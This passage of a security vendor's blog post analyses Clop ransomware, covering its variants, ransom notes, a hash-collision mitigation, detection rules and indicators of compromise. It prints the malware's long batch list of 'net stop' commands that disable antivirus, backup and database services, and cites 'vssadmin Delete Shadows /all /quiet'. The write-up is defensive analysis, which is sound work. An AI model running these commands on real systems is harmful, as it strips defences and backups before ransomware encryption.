net stop SQLAgent$SYSTEM_BGC /y

net stop “Sophos Device Control Service” /y

net stop macmnsvc /y

net stop SQLAgent$ECWDB2 /y

net stop “Zoolz 2 Service” /y

net stop McTaskManager /y

net stop “Sophos AutoUpdate Service” /y

net stop “Sophos System Protection Service” /y

net stop EraserSvc11710 /y

net stop PDVFSService /y

net stop SQLAgent$PROFXENGAGEMENT /y

net stop SAVService /y

net stop MSSQLFDLauncher$TPSAMA /y

net stop EPSecurityService /y

net stop SQLAgent$SOPHOS /y

net stop “Symantec System Recovery” /y

net stop Antivirus /y

net stop SstpSvc /y

net stop MSOLAP$SQL_2008 /y

net stop TrueKeyServiceHelper /y

net stop sacsvr /y

net stop VeeamNFSSvc /y

net stop FA_Scheduler /y

net stop SAVAdminService /y

net stop EPUpdateService /y

net stop VeeamTransportSvc /y

net stop “Sophos Health Service” /y

net stop bedbg /y

net stop MSSQLSERVER /y

net stop KAVFS /y

net stop Smcinst /y

net stop MSSQLServerADHelper100 /y

net stop TmCCSF /y

net stop wbengine /y

net stop SQLWriter /y

net stop MSSQLFDLauncher$TPS /y

net stop SmcService /y

net stop ReportServer$TPSAMA /y

net stop swi_update /y

net stop AcrSch2Svc /y

net stop MSSQL$SYSTEM_BGC /y

net stop VeeamBrokerSvc /y

net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

net stop VeeamDeploymentService /y

net stop SQLAgent$TPS /y

net stop DCAgent /y

net stop “Sophos Message Router” /y

net stop MSSQLFDLauncher$SBSMONITORING /y

net stop wbengine /y

net stop MySQL80 /y

net stop MSOLAP$SYSTEM_BGC /y

net stop ReportServer$TPS /y

net stop MSSQL$ECWDB2 /y

net stop SntpService /y

net stop SQLSERVERAGENT /y

net stop BackupExecManagementService /y

net stop SMTPSvc /y

net stop mfefire /y

net stop BackupExecRPCService /y

net stop MSSQL$VEEAMSQL2008R2 /y

net stop klnagent /y

net stop MSExchangeSA /y

net stop MSSQLServerADHelper /y

net stop SQLTELEMETRY /y

net stop “Sophos Clean Service” /y

net stop swi_update_64 /y

net stop “Sophos Web Control Service” /y

net stop EhttpSrv /y

net stop POP3Svc /y

net stop MSOLAP$TPSAMA /y

net stop McAfeeEngineService /y

net stop “Veeam Backup Catalog Data Service” /y

net stop MSSQL$SBSMONITORING /y

net stop ReportServer$SYSTEM_BGC /y

net stop AcronisAgent /y

net stop KAVFSGT /y

net stop BackupExecDeviceMediaService /y

net stop MySQL57 /y

net stop McAfeeFrameworkMcAfeeFramework /y

net stop TrueKey /y

net stop VeeamMountSvc /y

net stop MsDtsServer110 /y

net stop SQLAgent$BKUPEXEC /y

net stop UI0Detect /y

net stop ReportServer /y

net stop SQLTELEMETRY$ECWDB2 /y

net stop MSSQLFDLauncher$SYSTEM_BGC /y

net stop MSSQL$BKUPEXEC /y

net stop SQLAgent$PRACTTICEBGC /y

net stop MSExchangeSRS /y

net stop SQLAgent$VEEAMSQL2008R2 /y

net stop McShield /y

net stop SepMasterService /y

net stop “Sophos MCS Client” /y

net stop VeeamCatalogSvc /y

net stop SQLAgent$SHAREPOINT /y

net stop NetMsmqActivator /y

net stop kavfsslp /y

net stop tmlisten /y

net stop ShMonitor /y

net stop MsDtsServer /y

net stop SQLAgent$SQL_2008 /y

net stop SDRSVC /y

net stop IISAdmin /y

net stop SQLAgent$PRACTTICEMGT /y

net stop BackupExecJobEngine /y

net stop SQLAgent$VEEAMSQL2008R2 /y

net stop BackupExecAgentBrowser /y

net stop VeeamHvIntegrationSvc /y

net stop masvc /y

net stop W3Svc /y

net stop “SQLsafe Backup Service” /y

net stop SQLAgent$CXDB /y

net stop SQLBrowser /y

net stop MSSQLFDLauncher$SQL_2008 /y

net stop VeeamBackupSvc /y

net stop “Sophos Safestore Service” /y

net stop svcGenericHost /y

net stop ntrtscan /y

net stop SQLAgent$VEEAMSQL2012 /y

net stop MSExchangeMGMT /y

net stop SamSs /y

net stop MSExchangeES /y

net stop MBAMService /y

net stop EsgShKernel /y

net stop ESHASRV /y

net stop MSSQL$TPSAMA /y

net stop SQLAgent$CITRIX_METAFRAME /y

net stop VeeamCloudSvc /y

net stop “Sophos File Scanner Service” /y

net stop “Sophos Agent” /y

net stop MBEndpointAgent /y

net stop swi_service /y

net stop MSSQL$PRACTICEMGT /y

net stop SQLAgent$TPSAMA /y

net stop McAfeeFramework /y

net stop “Enterprise Client Service” /y

net stop SQLAgent$SBSMONITORING /y

net stop MSSQL$VEEAMSQL2012 /y

net stop swi_filter /y

net stop SQLSafeOLRService /y

net stop BackupExecVSSProvider /y

net stop VeeamEnterpriseManagerSvc /y

net stop SQLAgent$SQLEXPRESS /y

net stop OracleClientCache80 /y

net stop MSSQL$PROFXENGAGEMENT /y

net stop IMAP4Svc /y

net stop ARSM /y

net stop MSExchangeIS /y

net stop AVP /y

net stop MSSQLFDLauncher /y

net stop MSExchangeMTA /y

net stop TrueKeyScheduler /y

net stop MSSQL$SOPHOS /y

net stop “SQL Backups” /y

net stop MSSQL$TPS /y

net stop mfemms /y

net stop MsDtsServer100 /y

net stop MSSQL$SHAREPOINT /y

net stop WRSVC /y

net stop mfevtp /y

net stop msftesql$PROD /y

net stop mozyprobackup /y

net stop MSSQL$SQL_2008 /y

net stop SNAC /y

net stop ReportServer$SQL_2008 /y

net stop BackupExecAgentAccelerator /y

net stop MSSQL$SQLEXPRESS /y

net stop MSSQL$PRACTTICEBGC /y

net stop VeeamRESTSvc /y

net stop sophossps /y

net stop ekrn /y

net stop MMS /y

net stop “Sophos MCS Agent” /y

net stop RESvc /y

net stop “Acronis VSS Provider” /y

net stop MSSQL$VEEAMSQL2008R2 /y

net stop MSSQLFDLauncher$SHAREPOINT /y

net stop “SQLsafe Filter Service” /y

net stop MSSQL$PROD /y

net stop SQLAgent$PROD /y

net stop MSOLAP$TPS /y

net stop VeeamDeploySvc /y

net stop MSSQLServerOLAPService /y

The next change is the mutex name. In this version it is “HappyLife^_-”, so it can be complex to make a vaccine based on the mutex name because it can be changed easily in each new sample.

The next change is the hardcoded public key of the malware, which is different from the previous version.

Another change is the file created; the first version creates the file with the name “Favourite” but this version creates it with the name “Comone”.

However, the file encryption algorithm and the mark in the encrypted file are the same.

Another difference is the ransom note, which is now clearer after some changes in the text and now lists 3 email addresses instead of one to contact the ransomware developers.

FIGURE 15. Example of the new ransom note

Other Samples of the Malware

Clop is a ransomware family whose authors or affiliates can change it quickly to make the samples more complex to track. The code largely remains the same, but changing the strings can make it more difficult to detect and/or classify correctly.

Now we will look at the changes in some samples to see how prolific the Clop ransomware is.

Sample 0403db9fcb37bd8ceec0afd6c3754314 has a compile date of 12 February 2019 and the following changes compared with other samples:

  • The file created has the name “you_offer.txt”.
  • The name of the device in the fake calls to the “EraseTape” and “DefineDosDeviceA” functions is “..1”.
  • The atom searched for (for no purpose) has the name “$$$$”.
  • The mutex name is “MoneyP#666”.
  • The encrypted resources holding the batch file and the ransom note are called “SIXSIX1” and “SIXSIX”, respectively.
  • The name of the batch file is “clearsystems-10-1.bat”.
  • The key for the XOR operation to decrypt the ransom note and the batch file is:

“Clopfdwsjkjr23LKhuifdhwui73826ygGKUJFHGdwsieflkdsj324765tZPKQWLjwNVBFHewiuhryui32JKG”

  • The batch file is different from the other versions; in this case it does not change the boot configuration of the target victim.

FIGURE 16. Another version of the batch file

  • The email addresses to contact are: icarsole@protonmail.com and unlock@eaqltech.su.
  • As a curiosity, this ransom note has a line that the others do not: “Every day of delay will cost you additional +0.5 BTC” (about $1,500 to $1,700).

Sample 3ea56f82b66b26dc66ee5382d2b6f05d has the following points of difference:

  • The name of the file created is “popup.txt”.
  • The DefineDosDeviceA name is “1234567890”.
  • The mutex is “CLOP#666”.
  • This sample was compiled on 7 February.
  • The name of the bat file is “resort0-0-0-1-1-0-bat”.
  • This sample does not support Windows XP because it uses an API that does not exist in Windows XP.
  • The Atom string is “27”.

Sample 846f93fcb65c9e01d99b867fea384edc has these differences:

  • The name of the file created is “HotGIrls”.
  • The DosDevice name is “GVSDFDS”.
  • Atom name: KLHJGWSEUiokgvs.
  • Batch file name: “clearnetworksdns-11-22-33.bat”.
  • The email addresses to contact are: unlock@eqaltech.su, unlock@royalmail.su and lestschelager@protonmail.com.
  • The ransom note does not have the previous string about increasing the price, but the maximum number of files that can be decrypted is 7 instead of 6.

As the reader can see, Clop changes its strings and resource names very quickly to make the malware more complex to detect.

We also observed that the .BAT files were not present in earlier Clop ransomware versions.

Global Spread

Based on the versions of Clop we discovered, we detected telemetry hits in the following countries:

  • Switzerland
  • Great Britain
  • Belgium
  • United States
  • The Netherlands
  • Croatia
  • Puerto Rico
  • Germany
  • Turkey
  • Russia
  • Denmark
  • Mexico
  • Canada
  • Dominican Republic

Vaccine

The function that checks file and folder names using the custom hash algorithm can be a problem for the malware’s execution: if a name matching one of the hashes is found during execution, the malware will skip it. If this happens with a folder, all the files inside that folder are skipped as well.

As the algorithm and the hashes are based on 32 bits and only upper-case characters, it is very easy to create a collision, since we know the target hashes and the algorithm.

It cannot be used as a vaccine by itself, but it can help protect against the malware if the most critical files are kept inside a folder whose name collides with one of the hashes.

FIGURE 17. Collision of hashes

In the screenshot, “BOOT” is the correct name for the hash; the others are collisions.
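Clop’s actual algorithm is not reproduced here, but a toy 32-bit hash illustrates why such collisions are cheap to construct once the algorithm and target hashes are known (under this stand-in, any permutation of a protected name collides):

```python
# Toy stand-in hash (order-insensitive byte sum, truncated to 32 bits).
# Clop's real custom hash differs, but like any 32-bit hash over a small
# upper-case alphabet it can be collided quickly once it is known.
def toy_hash(name: str) -> int:
    return sum(ord(c) for c in name.upper()) & 0xFFFFFFFF

# "TOOB" and "OTOB" collide with the protected name "BOOT", so placing
# critical files in a folder with a colliding name makes the malware
# skip them.
assert toy_hash("TOOB") == toy_hash("BOOT")
assert toy_hash("OTOB") == toy_hash("BOOT")
```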

This malware changes so much per version that it prevents the creation of a normal vaccine using a mutex, etc.

The Odd One in the Family

Not all ransomware is created equally, and that goes especially for Clop. Earlier in this blog we highlighted some interesting choices the developers made when it came to detecting language settings and processes, and the use of batch files to delete the shadow volume copies. In our analysis we found some functions that are unique compared with other ransomware families.

However, Clop does embrace some of the procedures we have seen with other ransomware families by not listing the ransom amount or mentioning a bitcoin address.

Victims must communicate via email instead of with a central command and control server hosting decryption keys. In the newer versions of Clop, victims are required to state their company name and site in the email communications. We are not absolutely sure why this is, but it might be an effort to improve victim tracking.

Looking at the Clop ransom note, it shares TTPs with other ransomware families; e.g., it mimics the Ryuk ransomware and contains similarities with BitPaymer. However, the code and functions are quite different between them.

Coverage

Customers of McAfee gateway and endpoint products are protected against this version.

  • GenericRXHA-RK!3FE02FDD2439
  • GenericRXHA-RK!160FD326A825
  • Trojan-Ransom
  • Ransom-Clop!73FBFBB0FB34
  • Ransom-Clop!0403DB9FCB37
  • Ransom-Clop!227A9F493134
  • Ransom-Clop!A93B3DAA9460
  • GenericRXHA-RK!35792C550176
  • GenericRXHA-RK!738314AA6E07
  • RDN/Generic.dx
  • bub
  • BAT/Ransom-Clob
  • BAT/Ransom-Blob

McAfee ENS customers can create expert rules to prevent batch command execution by the ransomware. A few examples are given below for reference.

The following expert rule can be used to prevent the malware from deleting the shadow volumes with vssadmin (“vssadmin Delete Shadows /all /quiet”).

When the expert rule is applied at the endpoint, deletion of shadow volume fails with the following error message:

The malware also tries to stop McAfee services using command “net stop McShield /y”. The following expert rule can be used to prevent the malware from stopping McAfee Services:

When the expert rule is applied at the endpoint, the attempt to stop McAfee service using net command fails with the following error message:
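The Expert Rule syntax itself appears in the screenshots above; generically, the matching logic of both rules boils down to flagging the offending command lines, as in this illustrative sketch (not McAfee Expert Rule syntax):

```python
# Generic illustration of the detection logic (NOT Expert Rule syntax):
# flag command lines that delete shadow copies or stop McAfee services,
# matching the two behaviors described in the text.
import re

SHADOW_DELETE = re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.IGNORECASE)
STOP_MCAFEE = re.compile(r"net(\.exe)?\s+stop\s+mcshield", re.IGNORECASE)

def is_blocked(cmdline: str) -> bool:
    return bool(SHADOW_DELETE.search(cmdline) or STOP_MCAFEE.search(cmdline))

assert is_blocked("vssadmin Delete Shadows /all /quiet")
assert is_blocked("net stop McShield /y")
assert not is_blocked("vssadmin list shadows")
```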

Indicators of Compromise

The samples use the following MITRE ATT&CK™ techniques:

  • Execution through API (the batch file, for example).
  • Process discovery: enumerating all processes on the endpoint, matching some by name hash and others directly by name, to kill specific ones.
  • File and directory discovery: searching for files to encrypt.
  • Encrypting files.
  • Creating files.
  • Creating mutants.

Conclusion

Clop ransomware shows characteristics suggesting that enterprises, rather than end consumers, are its intended targets. The authors displayed some creative technical solutions to detect the victim’s language settings and installed programs. On the other hand, we also noticed some odd decisions when it came to coding certain functionalities in the ransomware. Unfortunately, it is not the first time criminals have made money with badly programmed malware.

Clop is constantly evolving and even though we do not know what new changes will be implemented in the future, McAfee ATR will keep a close watch.

IOCs

  • bc59ff12f71e9c8234c5e335d48f308207f6accfad3e953f447e7de1504e57af
  • 31829479fa5b094ca3cfd0222e61295fff4821b778e5a7bd228b0c31f8a3cc44
  • 35b0b54d13f50571239732421818c682fbe83075a4a961b20a7570610348aecc
  • e48900dc697582db4655569bb844602ced3ad2b10b507223912048f1f3039ac6
  • 00e815ade8f3ad89a7726da8edd168df13f96ccb6c3daaf995aa9428bfb9ecf1
  • 2f29950640d024779134334cad79e2013871afa08c7be94356694db12ee437e2
  • c150954e5fdfc100fbb74258cad6ef2595c239c105ff216b1d9a759c0104be04
  • 408af0af7419f67d396f754f01d4757ea89355ad19f71942f8d44c0d5515eec8
  • 0d19f60423cb2128555e831dc340152f9588c99f3e47d64f0bb4206a6213d579
  • 7ada1228c791de703e2a51b1498bc955f14433f65d33342753fdb81bb35e5886
  • 8e1bbe4cedeb7c334fe780ab3fb589fe30ed976153618ac3402a5edff1b17d64
  • d0cde86d47219e9c56b717f55dcdb01b0566344c13aa671613598cab427345b9
  • cff818453138dcd8238f87b33a84e1bc1d560dea80c8d2412e1eb3f7242b27da
  • 929b7bf174638ff8cb158f4e00bc41ed69f1d2afd41ea3c9ee3b0c7dacdfa238
  • 102010727c6fbcd9da02d04ede1a8521ba2355d32da849226e96ef052c080b56
  • 7e91ff12d3f26982473c38a3ae99bfaf0b2966e85046ebed09709b6af797ef66
  • e19d8919f4cb6c1ef8c7f3929d41e8a1a780132cb10f8b80698c8498028d16eb
  • 3ee9b22827cb259f3d69ab974c632cefde71c61b4a9505cec06823076a2f898e

The post Clop Ransomware appeared first on McAfee Blogs.